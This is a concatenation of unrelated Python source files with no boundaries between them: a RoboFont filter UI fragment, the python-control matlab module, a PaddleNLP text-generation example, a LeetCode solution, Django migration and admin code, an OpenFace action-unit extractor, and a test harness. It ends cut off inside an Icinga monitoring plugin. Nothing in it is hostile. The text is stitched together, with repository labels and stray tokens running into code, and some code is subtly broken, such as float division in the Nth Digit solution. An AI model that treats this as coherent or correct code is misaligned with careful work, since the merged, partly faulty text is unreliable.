22), arg, sizeStyle='small')) setattr(self.w.filtersPanel.options, attrName, Slider((168, 15 + (i*30), -15, 22), minValue=mini, maxValue=maxi, value=value, callback=self.setArgumentValue)) control = getattr(self.w.filtersPanel.options, attrName) control.name = arg control.type = valueType def stringInput(self, sender): text = sender.get() if self.currentFont is not None: cmap = self.currentFont.getCharacterMapping() self.glyphNames = splitText(text, cmap) else: self.glyphNames = [] self.updatePreview() def filterEdit(self, sender): filterName = self.currentFilterKey self.buildFilterSheet(filterName) self.filterSheet.open() def buildFilterSheet(self, filterName='', makeNew=False): sheetFields = { 'fileName': '', 'modulePath': '', 'filterObject': '', 'limits': {}, 'arguments': {}, } if filterName != '': filterDict = self.filters[filterName] for key in filterDict: sheetFields[key] = filterDict[key] self.filterSheet = Sheet((0, 0, 400, 350), self.w) self.filterSheet.new = makeNew applyTitle = 'Add Filter' if filterName == '' else 'Update Filder' self.filterSheet.apply = SquareButton((-115, -37, 100, 22), applyTitle, callback=self.processFilter, sizeStyle='small') self.filterSheet.cancel = SquareButton((-205, -37, 80, 22), 'Cancel', callback=self.closeFilterSheet, sizeStyle='small') y = 20 self.filterSheet.nameTitle = TextBox((15, y, 100, 22), 'Filter Name') self.filterSheet.name = EditText((125, y, -15, 22), filterName) y += 22 tabs = ['module','file'] y += 20 self.filterSheet.importPath = Tabs((15, y, -15, 75), tabs) modulePath = self.filterSheet.importPath[0] filePath = self.filterSheet.importPath[1] modulePath.pathInput = EditText((10, 10, -10, -10), sheetFields['modulePath']) filePath.pathInput = EditText((10, 10, -110, -10), sheetFields['fileName']) if len(sheetFields['modulePath']) > 0: self.filterSheet.importPath.set(0) elif len(sheetFields['fileName']) > 0: self.filterSheet.importPath.set(1) filePath.fileInput = SquareButton((-100, 10, 90, -10), u'Add File…', sizeStyle='small', callback=self.getFile) y += 75 y += 10 self.filterSheet.filterObjectTitle = TextBox((15, y, 100, 22), 'Filter Object (pen, function)') self.filterSheet.filterObject = EditText((125, y, -15, 22), sheetFields['filterObject']) y += 22 y += 20 columns = [ {'title': 'argument', 'width': 160, 'editable':True}, {'title': 'value', 'width': 71, 'editable':True}, {'title': 'min', 'width': 49, 'editable':True}, {'title': 'max', 'width': 49, 'editable':True} ] arguments = sheetFields['arguments'] limits = sheetFields['limits'] argumentItems = [] for key, value in arguments.items(): if isinstance(value, bool): value = str(value) elif isinstance(value, float): value = round(value, 2) argItem = { 'argument': key, 'value': value } if limits.has_key(key): minimum, maximum = sheetFields['limits'][key] argItem['min'] = minimum argItem['max'] = maximum argumentItems.append(argItem) buttonSize = 20 gutter = 7 self.filterSheet.arguments = List((15 + buttonSize + gutter, y, -15, -52), argumentItems, columnDescriptions=columns, allowsMultipleSelection=False, allowsEmptySelection=False) self.filterSheet.addArgument = SquareButton((15, -52-(buttonSize*2)-gutter, buttonSize, buttonSize), '+', sizeStyle='small', callback=self.addArgument) self.filterSheet.removeArgument = SquareButton((15, -52-buttonSize, buttonSize, buttonSize), '-', sizeStyle='small', callback=self.removeArgument) if len(argumentItems) == 0: self.filterSheet.removeArgument.enable(False) if filterName == '': self.currentFilterKey = '' def addArgument(self, sender): argumentsList = self.filterSheet.arguments.get() argumentsList.append({'argument': 'rename me', 'value': 50, 'min': 0, 'max': 100}) if len(argumentsList) > 0: self.filterSheet.removeArgument.enable(True) self.filterSheet.arguments.set(argumentsList) def removeArgument(self, sender): argumentsList = self.filterSheet.arguments.get() if len(argumentsList) == 0: self.filterSheet.removeArgument.enable(False) selection = self.filterSheet.arguments.getSelection()[0] argumentsList.pop(selection) self.filterSheet.arguments.set(argumentsList) def getFile(self, sender): path = getFile(fileTypes=['py'], allowsMultipleSelection=False, resultCallback=self.loadFilePath, parentWindow=self.filterSheet) def loadFilePath(self, paths): path = paths[0] fileName = path.split('/')[-1] folder = '/'.join(__file__.split('/')[:-1]) dest = '{0}/filterObjects/{1}'.format(folder, fileName) shutil.copyfile(path, dest) self.filterSheet.importPath[1].pathInput.set(fileName[:-3]) def closeFilterSheet(self, sender): self.filterSheet.close() delattr(self, 'filterSheet') def processFilter(self, sender): argumentsList = self.filterSheet.arguments.get() filterName = self.filterSheet.name.get() filterDict = {} if len(filterName) > 0: index = self.filterSheet.importPath.get() mode = ['modulePath','fileName'][index] filterDict[mode] = importString = self.filterSheet.importPath[index].pathInput.get() if len(importString) > 0: filterDict['filterObject'] = filterObject = self.filterSheet.filterObject.get() if len(filterObject) > 0: for argItem in argumentsList: if argItem.has_key('argument'): key = argItem['argument'] if argItem.has_key('value'): value = self.parseValue(argItem['value']) if not filterDict.has_key('arguments'): filterDict['arguments'] = {} filterDict['arguments'][key] = value if argItem.has_key('min') and argItem.has_key('max'): try: mini, maxi = float(argItem['min']), float(argItem['max']) if not filterDict.has_key('limits'): filterDict['limits'] = {} filterDict['limits'][key] = (mini, maxi) except: pass if filterName in self.filters: self.filters[filterName] = filterDict elif self.filterSheet.new == False: index = self.w.filtersPanel.filtersList.getSelection()[0] self.filters.changeFilterNameByIndex(index, filterName) self.filters[filterName] = filterDict elif self.filterSheet.new == True: self.filters.addFilter(filterName, filterDict) self.closeFilterSheet(sender) self.updateFiltersList() self.updateOptions() self.updatePreview() def addFilter(self, sender): self.buildFilterSheet(makeNew=True) self.filterSheet.open() def removeFilter(self, sender): filterName = self.currentFilterKey self.filters.removeFilter(filterName) self.updateFiltersList() def filterSelectionChanged(self, sender): selectedFilterName = self.getSelectedFilterName() if selectedFilterName in ['Flatten', 'Jitter']: self.w.filtersPanel.removeFilter.enable(False) else: self.w.filtersPanel.removeFilter.enable(True) self.cachedFont = RFont(showUI=False) self.currentFilterKey = selectedFilterName self.updateOptions() self.updatePreview() def getCurrentFilter(self): return self.filters[self.currentFilterKey] def getSelectedFilterName(self): filtersList = self.w.filtersPanel.filtersList filterNamesList = filtersList.get() selection = filtersList.getSelection()[0] return filterNamesList[selection] def switchFillStroke(self, sender): self.fill = not self.fill displayStates = self.w.preview.getDisplayStates() if self.fill == True: sender.setTitle('Fill') displayStates['Fill'] = True displayStates['Stroke'] = False elif self.fill == False: sender.setTitle('Stroke') displayStates['Fill'] = False displayStates['Stroke'] = True self.w.preview.setDisplayStates(displayStates) def parseValue(self, value): if isinstance(value, bool): value = bool(value) elif isinstance(value, (str, unicode)) and value.lower() == 'true': value = True elif isinstance(value, (str, unicode)) and value.lower() == 'false': value = False elif value is not '' or value is not None: try: value = float(value) except: pass return value def fontChanged(self, notification): self.currentFont = notification['font'] self.cachedFont = RFont(showUI=False) self.updatePreview() def end(self, notification): self.filters.update() for callback, event in self.observers: removeObserver(self, event) PenBallWizard() if __name__ == '__main__': import unittestcontrol/matlab/__init__.py # -*- coding: utf-8 -*- """ The :mod:`control.matlab` module contains a number of functions that emulate some of the functionality of MATLAB. The intent of these functions is to provide a simple interface to the python control systems library (python-control) for people who are familiar with the MATLAB Control Systems Toolbox (tm). """ """Copyright (c) 2009 by California Institute of Technology All rights reserved. Copyright (c) 2011 by Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the California Institute of Technology nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CALTECH OR THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Author: Date: 29 May 09 Revised: , Dec 10 $Id$ """ # Import MATLAB-like functions that are defined in other packages from scipy.signal import zpk2ss, ss2zpk, tf2zpk, zpk2tf from numpy import linspace, logspace # If configuration is not yet set, import and use MATLAB defaults import sys if not ('.config' in sys.modules): from .. import config config.use_matlab_defaults() # Control system library from ..statesp import * from ..xferfcn import * from ..lti import * from ..frdata import * from ..dtime import * from ..exception import ControlArgument # Import MATLAB-like functions that can be used as-is from ..ctrlutil import * from ..freqplot import nyquist, gangof4 from ..nichols import nichols from ..bdalg import * from ..pzmap import * from ..statefbk import * from ..delay import * from ..modelsimp import * from ..mateqn import * from ..margins import margin from ..rlocus import rlocus from ..dtime import c2d from ..sisotool import sisotool # Import functions specific to Matlab compatibility package from .timeresp import * from .wrappers import * r""" The following tables give an overview of the module ``control.matlab``. They also show the implementation progress and the planned features of the module. The symbols in the first column show the current state of a feature: * ``*`` : The feature is currently implemented. * ``-`` : The feature is not planned for implementation. * ``s`` : A similar feature from another library (Scipy) is imported into the module, until the feature is implemented here. Creating linear models ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`tf` create transfer function (TF) models \ zpk create zero/pole/gain (ZPK) models. \* :func:`ss` create state-space (SS) models \ dss create descriptor state-space models \ delayss create state-space models with delayed terms \* :func:`frd` create frequency response data (FRD) models \ lti/exp create pure continuous-time delays (TF and ZPK only) \ filt specify digital filters \- lti/set set/modify properties of LTI models \- setdelaymodel specify internal delay model (state space only) \* :func:`rss` create a random continuous state space model \* :func:`drss` create a random discrete state space model == ========================== ============================================ Data extraction ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`tfdata` extract numerators and denominators \ lti/zpkdata extract zero/pole/gain data \ lti/ssdata extract state-space matrices \ lti/dssdata descriptor version of SSDATA \ frd/frdata extract frequency response data \ lti/get access values of LTI model properties \ ss/getDelayModel access internal delay model (state space) == ========================== ============================================ Conversions ---------------------------------------------------------------------------- == ============================ ============================================ \* :func:`tf` conversion to transfer function \ zpk conversion to zero/pole/gain \* :func:`ss` conversion to state space \* :func:`frd` conversion to frequency data \* :func:`c2d` continuous to discrete conversion \ d2c discrete to continuous conversion \ d2d resample discrete-time model \ upsample upsample discrete-time LTI systems \* :func:`ss2tf` state space to transfer function \s :func:`~scipy.signal.ss2zpk` transfer function to zero-pole-gain \* :func:`tf2ss` transfer function to state space \s :func:`~scipy.signal.tf2zpk` transfer function to zero-pole-gain \s :func:`~scipy.signal.zpk2ss` zero-pole-gain to state space \s :func:`~scipy.signal.zpk2tf` zero-pole-gain to transfer function == ============================ ============================================ System interconnections ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.append` group LTI models by appending inputs/outputs \* :func:`~control.parallel` connect LTI models in parallel (see also overloaded ``+``) \* :func:`~control.series` connect LTI models in series (see also overloaded ``*``) \* :func:`~control.feedback` connect lti models with a feedback loop \ lti/lft generalized feedback interconnection \* :func:`~control.connect` arbitrary interconnection of lti models \ sumblk summing junction (for use with connect) \ strseq builds sequence of indexed strings (for I/O naming) == ========================== ============================================ System gain and dynamics ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`dcgain` steady-state (D.C.) gain \ lti/bandwidth system bandwidth \ lti/norm h2 and Hinfinity norms of LTI models \* :func:`pole` system poles \* :func:`zero` system (transmission) zeros \ lti/order model order (number of states) \* :func:`~control.pzmap` pole-zero map (TF only) \ lti/iopzmap input/output pole-zero map \* :func:`damp` natural frequency, damping of system poles \ esort sort continuous poles by real part \ dsort sort discrete poles by magnitude \ lti/stabsep stable/unstable decomposition \ lti/modsep region-based modal decomposition == ========================== ============================================ Time-domain analysis ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`step` step response \ stepinfo step response characteristics \* :func:`impulse` impulse response \* :func:`initial` free response with initial conditions \* :func:`lsim` response to user-defined input signal \ lsiminfo linear response characteristics \ gensig generate input signal for LSIM \ covar covariance of response to white noise == ========================== ============================================ Frequency-domain analysis ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`bode` Bode plot of the frequency response \ lti/bodemag Bode magnitude diagram only \ sigma singular value frequency plot \* :func:`~control.nyquist` Nyquist plot \* :func:`~control.nichols` Nichols plot \* :func:`margin` gain and phase margins \ lti/allmargin all crossover frequencies and margins \* :func:`freqresp` frequency response over a frequency grid \* :func:`evalfr` frequency response at single frequency == ========================== ============================================ Model simplification ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.minreal` minimal realization; pole/zero cancellation \ ss/sminreal structurally minimal realization \* :func:`~control.hsvd` hankel singular values (state contributions) \* :func:`~control.balred` reduced-order approximations of LTI models \* :func:`~control.modred` model order reduction == ========================== ============================================ Compensator design ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`rlocus` evans root locus \* :func:`sisotool` SISO controller design \* :func:`~control.place` pole placement \ estim form estimator given estimator gain \ reg form regulator given state-feedback and estimator gains == ========================== ============================================ LQR/LQG design ---------------------------------------------------------------------------- == ========================== ============================================ \ ss/lqg single-step LQG design \* :func:`~control.lqr` linear quadratic (LQ) state-fbk regulator \ dlqr discrete-time LQ state-feedback regulator \ lqry LQ regulator with output weighting \ lqrd discrete LQ regulator for continuous plant \ ss/lqi Linear-Quadratic-Integral (LQI) controller \ ss/kalman Kalman state estimator \ ss/kalmd discrete Kalman estimator for cts plant \ ss/lqgreg build LQG regulator from LQ gain and Kalman estimator \ ss/lqgtrack build LQG servo-controller \ augstate augment output by appending states == ========================== ============================================ State-space (SS) models ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`rss` random stable cts-time state-space models \* :func:`drss` random stable disc-time state-space models \ ss2ss state coordinate transformation \ canon canonical forms of state-space models \* :func:`~control.ctrb` controllability matrix \* :func:`~control.obsv` observability matrix \* :func:`~control.gram` controllability and observability gramians \ ss/prescale optimal scaling of state-space models. \ balreal gramian-based input/output balancing \ ss/xperm reorder states. == ========================== ============================================ Frequency response data (FRD) models ---------------------------------------------------------------------------- == ========================== ============================================ \ frd/chgunits change frequency vector units \ frd/fcat merge frequency responses \ frd/fselect select frequency range or subgrid \ frd/fnorm peak gain as a function of frequency \ frd/abs entrywise magnitude of frequency response \ frd/real real part of the frequency response \ frd/imag imaginary part of the frequency response \ frd/interp interpolate frequency response data \* :func:`~control.mag2db` convert magnitude to decibels (dB) \* :func:`~control.db2mag` convert decibels (dB) to magnitude == ========================== ============================================ Time delays ---------------------------------------------------------------------------- == ========================== ============================================ \ lti/hasdelay true for models with time delays \ lti/totaldelay total delay between each input/output pair \ lti/delay2z replace delays by poles at z=0 or FRD phase shift \* :func:`~control.pade` pade approximation of time delays == ========================== ============================================ Model dimensions and characteristics ---------------------------------------------------------------------------- == ========================== ============================================ \ class model type ('tf', 'zpk', 'ss', or 'frd') \ isa test if model is of given type \ tf/size model sizes \ lti/ndims number of dimensions \ lti/isempty true for empty models \ lti/isct true for continuous-time models \ lti/isdt true for discrete-time models \ lti/isproper true for proper models \ lti/issiso true for single-input/single-output models \ lti/isstable true for models with stable dynamics \ lti/reshape reshape array of linear models == ========================== ============================================ Overloaded arithmetic operations ---------------------------------------------------------------------------- == ========================== ============================================ \* \+ and - add, subtract systems (parallel connection) \* \* multiply systems (series connection) \ / right divide -- sys1\*inv(sys2) \- \\ left divide -- inv(sys1)\*sys2 \ ^ powers of a given system \ ' pertransposition \ .' transposition of input/output map \ .\* element-by-element multiplication \ [..] concatenate models along inputs or outputs \ lti/stack stack models/arrays along some dimension \ lti/inv inverse of an LTI system \ lti/conj complex conjugation of model coefficients == ========================== ============================================ Matrix equation solvers and linear algebra ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.lyap` solve continuous-time Lyapunov equations \* :func:`~control.dlyap` solve discrete-time Lyapunov equations \ lyapchol, dlyapchol square-root Lyapunov solvers \* :func:`~control.care` solve continuous-time algebraic Riccati equations \* :func:`~control.dare` solve disc-time algebraic Riccati equations \ gcare, gdare generalized Riccati solvers \ bdschur block diagonalization of a square matrix == ========================== ============================================ Additional functions ---------------------------------------------------------------------------- == ========================== ============================================ \* :func:`~control.gangof4` generate the Gang of 4 sensitivity plots \* :func:`~numpy.linspace` generate a set of numbers that are linearly spaced \* :func:`~numpy.logspace` generate a set of numbers that are logarithmically spaced \* :func:`~control.unwrap` unwrap phase angle to give continuous curve == ========================== ============================================ """ # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from paddlenlp.transformers import UNIMOLMHeadModel, UNIMOTokenizer model_name = 'unimo-text-1.0-lcsts-new' model = UNIMOLMHeadModel.from_pretrained(model_name) tokenizer = UNIMOTokenizer.from_pretrained(model_name) def postprocess_response(token_ids, tokenizer): """Post-process the decoded sequence. Truncate from the first .""" eos_pos = len(token_ids) for i, tok_id in enumerate(token_ids): if tok_id == tokenizer.mask_token_id: eos_pos = i break token_ids = token_ids[:eos_pos] tokens = tokenizer.convert_ids_to_tokens(token_ids) tokens = tokenizer.merge_subword(tokens) return tokens inputs = "深度学习是人工智能的核心技术领域。百度飞桨作为中国首个自主研发、功能丰富、开源开放的产业级深度学习平台,将从多层次技术产品、产业AI人才培养和强大的生态资源支持三方面全面护航企业实现快速AI转型升级。" inputs_ids = tokenizer.gen_encode( inputs, add_start_token_for_decoding=True, return_tensors=True, is_split_into_words=False) model.eval() outputs, _ = model.generate( input_ids=inputs_ids['input_ids'], token_type_ids=inputs_ids['token_type_ids'], position_ids=inputs_ids['position_ids'], attention_mask=inputs_ids['attention_mask'], max_length=64, decode_strategy='beam_search', num_beams=2) result = postprocess_response(outputs[0].numpy(), tokenizer) result = "".join(result) print("Model input:", inputs) print("Result:", result) # 百度飞桨:深度学习助力企业转型升级 610yilingliu/leetcode # # @lc app=leetcode id=400 lang=python3 # # [400] Nth Digit # # @lc code=start class Solution(object): def findNthDigit(self, n): """ :type n: int :rtype: int """ N=1 while n>0: r= 9* 10**(N-1)*N if n>r: n-=r N+=1 else: number= 10**(N-1) + (n-1)/N return int(str(number)[(n-1)%N]) # @lc code=end # def merge(l1, l2): # ans = [] # # 如果l1和l2都不为空 # while l1 and l2: # # 如果l1的第一个元素小于等于l2的第二个元素 # if l1[0] <= l2[0]: # # 将l1的第一个元素加入answer # ans.append(l1[0]) # # 把l1中的第一个元素从l1中删除 # l1.pop(0) # else: # ans.append(l2[0]) # l2.pop(0) # # 如果剩下的,还有元素的列表是l1 # if l1: # # 拼接ans和剩余l1 # return ans + l1 # # 如果剩余的列表是l2,拼接ans和l2 # return ans + l2 matu3ba/cports pkgname = "python-six" pkgver = "1.16.0" pkgrel = 0 build_style = "python_module" hostmakedepends = ["python-setuptools"] checkdepends = ["python-pytest"] depends = ["python"] pkgdesc = "Python compatibility utilities" maintainer = "q66 <>" license = "MIT" url = "https://github.com/benjaminp/six" source = f"$(PYPI_SITE)/s/six/six-{pkgver}.tar.gz" sha256 = "1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926" # pytest not packaged yet options = ["!check"] def post_install(self): self.install_license("LICENSE") #!/usr/bin/env python3 import sys grid = [False]*(128*8) ans = -1 for line in sys.stdin: s = line.rstrip().replace('B', '1').replace('F', '0').replace('L', '0').replace('R', '1') s = int(s, 2) ans = max(s, ans) print(ans) 0 from stix.core import STIXPackage from stix.report import Report from stix.report.header import Header stix_package=STIXPackage() stix_report=Report() stix_report.header=Header() stix_report.header.description="Getting Started" stix_package.add(stix_report) print(stix_package.to_xml())from pathlib import Path import glob def replace(fn): with Path(fn).open('r') as f: lines = f.readlines() new_lines = [] is_start = True no_lang = False for i, l in enumerate(lines): if '```' in l: if is_start: try: lang = l.split('```')[-1].split('\n')[0].replace(' ', '') except: lang = '' if lang: print('replacing language {} at line {} in file {}'.format( lang, i, fn )) new_lines += ['{% highlight ' + lang + ' %}\n'] else: new_lines += l no_lang = True is_start = False else: try: lang = l.split('```')[-1].split('\n')[0].replace(' ', '') except: lang = '' if lang: raise ValueError('Error. closing ``` might be missing in file', fn) if no_lang: new_lines += l no_lang = False else: new_lines += ['{% endhighlight %}\n'] is_start = True else: new_lines += [l] with Path(fn).open('w') as f: f.writelines(new_lines) if __name__ == '__main__': print('Replacing ``` by highlight tags if a language is specified') path = Path().absolute() files = list(glob.iglob(str(path) + '/**/*.md', recursive=True)) for filename in files: replace(filename) from dataclasses import make_dataclass from typing import Dict, List NAMES: List[str] = [ "V1", "n", "KI", "K1", "V2", "K2", "k3", "K3", "k4", "K4", "V5", "K5", "V6", "K6", "k7", "K7", "k8", "K8", "V9", "K9", "V10", "K10", ] NUM: int = len(NAMES) Parameters = make_dataclass( cls_name="Parameters", fields=[(name, int) for name in NAMES], namespace={"NAMES": NAMES, "NUM": NUM}, frozen=True, ) name2idx: Dict[str, int] = {k: v for v, k in enumerate(NAMES)} C = Parameters(**name2idx) del name2idx tools/extract_au.py """ Created on Apr 15, 2019 @author: """ import os import subprocess import inspect import time import glob import argparse import csv import numpy as np import pickle class AUSDetector(object): """Using OpenFace to detect Action Units""" def __init__(self): super(AUSDetector, self).__init__() self.ALL_AUS = ['AU01', 'AU02', 'AU04', 'AU05', 'AU06', 'AU07', 'AU09', 'AU10', 'AU12', \ 'AU14', 'AU15', 'AU17', 'AU20', 'AU23', 'AU25', 'AU26', 'AU28', 'AU45'] def initialize(self, opt): self.bin_path = opt.bin_path self.img_ext = opt.img_ext self.raw_img_dir = opt.raw_img_dir self.out_dir = os.path.join(opt.root_dir, 'aus_csv') if not os.path.isdir(self.out_dir): os.makedirs(self.out_dir) self.pkl_path = os.path.join(opt.root_dir, 'aus_openface.pkl') self.FILTER_AUS = sorted(map(lambda x: 'AU%02d' % int(x), list(opt.aus.split(',')))) def run(self): total_aus_dict = {} imgs_path = self.get_image_list() # [:3] imgs_len = len(imgs_path) total_cost = 0.0 for idx, img_path in enumerate(imgs_path): start_t = time.time() total_aus_dict.update(self.detect_aus(img_path)) cur_cost = time.time() - start_t total_cost += cur_cost avg_cost = total_cost / (idx + 1.) print("[Success][%d/%d] Got AU of %s in %.2fs, remaining %.2f mins." % (idx, imgs_len - 1, os.path.basename(img_path), cur_cost, (imgs_len - idx - 1.) * avg_cost / 60.)) with open(self.pkl_path, 'wb') as f: pickle.dump(total_aus_dict, f, protocol=2) return total_aus_dict def detect_aus(self, img_path): # run au bin img_name = os.path.basename(img_path) out_name = os.path.splitext(img_name)[0] with open(os.devnull, 'w') as shutup: command_list = [self.bin_path, '-f', img_path, '-out_dir', self.out_dir, '-of', out_name, '-aus'] return_code = subprocess.call(command_list, stdout=shutup, stderr=shutup) # parse au csv_path = os.path.join(self.out_dir, out_name + ".csv") aus_dict = {} try: with open(csv_path, 'r') as f: csv_reader = csv.reader(f) for idx, row in enumerate(csv_reader): # if idx == 0: # print(row[2:2+17]) if idx > 0: aus_dict[img_name] = [int(float(row[19+i])) for i, n in enumerate(self.ALL_AUS) if n in self.FILTER_AUS] except IOError: with open(os.path.join(self.out_dir, 'err.log'), 'a+') as f: f.write("Fail to detect au on %s.\n" % img_name) # clear tmp file txt_path = os.path.join(self.out_dir, out_name + "_of_details.txt") if os.path.isfile(txt_path): os.remove(txt_path) # return current au list return aus_dict def get_image_list(self): # copy from preprocess_ckplus.py image_list = [] for subject in glob.glob(os.path.join(self.raw_img_dir, '*/')): for clip in glob.glob(os.path.join(subject, '*/')): items = sorted(glob.glob(os.path.join(clip, '*.%s' % self.img_ext))) image_list.extend(items[-3:]) print(len(image_list)) return image_list def main(): ausDetector = AUSDetector() cur_file_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--bin_path', required=True, help="OpenFace binary path 'FaceLandmarkImg'.") parser.add_argument('--aus', type=str, default='1,2,4,5,6,7,9,12,17,23,25', help='AUs vector index.') parser.add_argument('--img_ext', type=str, default='png', help='Image extension.') parser.add_argument('--raw_img_dir', type=str, default=os.path.join(cur_file_path, '../datasets/CKPlus/RAW/cohn-kanade-images'), help='raw image dataset dir.') parser.add_argument('--root_dir', type=str, default=os.path.join(cur_file_path, '../datasets/CKPlus'), help='dataset root dir.') opt = parser.parse_args() ausDetector.initialize(opt) ausDetector.run() if __name__ == "__main__": main() # Generated by Django 2.2.2 on 2019-06-24 15:20 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('shorterurls', '0001_initial'), ] operations = [ migrations.RenameField( model_name='storedurls', old_name='url_after_short', new_name='full_url', ), migrations.RenameField( model_name='storedurls', old_name='url_before_short', new_name='short_url', ), ] # Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """The proposer base class.""" from abc import ABC, abstractmethod from marshmallow import ValidationError from mindinsight.profiler.common.log import logger from mindinsight.profiler.analyser.analyser_factory import AnalyserFactory from mindinsight.utils.exceptions import MindInsightException from mindinsight.profiler.common.validator.validate_path import \ validate_and_normalize_path from mindinsight.profiler.common.exceptions.exceptions import ProfilerPathErrorException class Proposer(ABC): """The proposer base class.""" def __init__(self, profiling_path, rank_id): self.profiling_path = self._normalize_profiling_dir(profiling_path) self.rank_id = rank_id def get_analyser_result(self, analyser_type, condition=None): logger.debug("The Proposer 'analyser_type' is %s, 'options' is %s", str(analyser_type), str(condition)) analyser_result = {} try: analyser = AnalyserFactory.instance().get_analyser(analyser_type, self.profiling_path, self.rank_id) analyser_result = analyser.query(condition) logger.debug("The 'analyser_result' is %s, the 'condition' is %s.", str(analyser_result), str(condition)) except MindInsightException as e: logger.warning(e) return analyser_result @abstractmethod def analyze(self, options=None): """analysis and get proposal.""" raise NotImplementedError("Must define analyze function to inherit Class Propose") @staticmethod def _normalize_profiling_dir(profiling_dir): """ Normalize the profiling dir. Args: profiling_dir (str): The directory where the parsed profiling files are located. Returns: str, the normalized profiling dir. """ try: normalized_profiling_dir = validate_and_normalize_path( profiling_dir, 'profiler' ) except ValidationError: raise ProfilerPathErrorException('The profiling dir is invalid.') return normalized_profiling_dir # -*- coding: utf-8 -*- """ Created on Mon Feb 11 17:46:56 2019 @author: """ import signal import threading from Util.Log import * class TestResult(Enum): Success = 0 Failure = 1 class Test(object): def __init__(self, name=None, network=None): self.name = name if name is not None else type(self).__name__ self.network = network self.process_interval = 1 self.update_interval = 1 self.result = None self.max_duration = 0 self.timeout_timer = None self.events_timer = None self.update_timer = None def setup(self): pass def update(self): pass def on_complete(self): pass def on_succeed(self): pass def on_fail(self): pass def update_timer_fired(self): self.update() self.update_timer = threading.Timer(self.update_interval, self.update_timer_fired) self.update_timer.start() def events_timer_fired(self): self.network.process_events() self.events_timer = threading.Timer(self.process_interval, self.events_timer_fired) self.events_timer.start() def timeout_timer_fired(self): if self.result is None: self.finish_with_result(TestResult.Failure) def sigint_handler(self, *args): self.stop() def start(self): try: Log.info("\nTest started (" + self.name + ")\n") signal.signal(signal.SIGINT, self.sigint_handler) self.setup() self.events_timer = threading.Timer(self.process_interval, self.events_timer_fired) self.events_timer.start() self.update_timer = threading.Timer(self.update_interval, self.update_timer_fired) self.update_timer.start() if self.max_duration > 0: self.timeout_timer = threading.Timer(self.max_duration, self.timeout_timer_fired) self.timeout_timer.start() except (KeyboardInterrupt, SystemExit): Log.error("\nAborting.") def stop(self): if self.timeout_timer is not None: self.timeout_timer.cancel() if self.events_timer is not None: self.events_timer.cancel() if self.update_timer is not None: self.update_timer.cancel() def finish_with_result(self, result): self.stop() if self.network is not None: print() self.network.shutdown() self.result = result self.on_complete() if result == TestResult.Success: Log.info("\nTest succeeded (" + self.name + ")\n") self.on_succeed() if result == TestResult.Failure: Log.warn("\nTest failed (" + self.name + ")\n") self.on_fail() shubham2803/todo0 from django.contrib import admin from rest_framework.authtoken.models import Token from .models import Todo # Register your models here. admin.site.register(Todo) class FilterTokenAdmin(admin.ModelAdmin): search_fields = ['user__email', 'user__username'] admin.site.register(Token, FilterTokenAdmin) 0 #! /usr/bin/env python3 # -*- coding: utf-8; py-indent-offset: 4 -*- # # Author: # Contact: icinga (at) buchermail (dot) de # # License: The Unlicense, see LICENSE file. # https://github.com/anbucher/check_fr24feed.git """Have a look at the check's README for further details. """ import argparse from difflib import diff_bytes import sys import json import datetime import requests from requests.structures import CaseInsensitiveDict from traceback import format_exc __author__ = '' __version__ = '2022031701' DESCRIPTION = """This plugin lets you track if a fr24feeder is connected""" # Sample URL: https://{feeder_ip}:8754/monitor.json DEFAULT_PORT = '8754' DEFAULT_WARN = 600 # seconds DEFAULT_CRIT = 3600 # seconds ## Define states # STATE_OK = 0: The plugin was able to check the service and it appeared # to be functioning properly. # STATE_WARN = 1: The plugin was able to check the service, but it # appeared to be above some "warning" threshold or did not appear to be # working properly. # STATE_CRIT = 2: The plugin detected that either the 